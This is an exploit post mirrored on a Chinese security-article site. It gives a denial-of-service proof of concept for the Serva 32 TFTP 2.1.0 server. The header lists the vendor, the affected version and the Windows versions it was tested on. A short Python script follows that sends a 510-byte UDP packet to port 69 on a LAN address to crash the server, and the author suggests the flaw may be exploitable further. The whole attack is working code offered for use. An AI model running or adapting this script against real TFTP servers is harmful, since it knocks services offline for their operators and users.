Serva 32 TFTP 2.1.0 - Buffer Overflow Denial of service

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Serva 32 TFTP 2.1.0 - Buffer Overflow Denial of service

来源：vfocus.net 作者：Sapling 发布时间：2013-05-16

#Serva 32 TFTP Buffer overflow DoS
#
#05/14/2013
#Sapling
#Vendor homepage http://www.vercot.com/
#Software Link:
#http://www.vercot.com/~serva/download/Serva_Non-Supporter_32_v2.1.0.zip
#Version 2.1.0 Only prior versions are not vulnerable
#Tested on Windows 8, Windows 7, Windows XP SP1-3
#CVE to be established today or tomorrow.
#
#This is the serva 32 Proof Of Concept exploit discovered and written by
Sapling. At this
#time the exploit is only a denial of service but evidence show it may be
controllable.
#The difficulty with controlling it at this point was the failure to
overwrite the SEH
#chains or bypass them. The crash occurs when sending a message longer than
509 bytes long

#start of python file
import sys
import socket

new = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
new.connect(('192.168.1.19', 69))
new.send('\x41'*510)
#end of python file

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告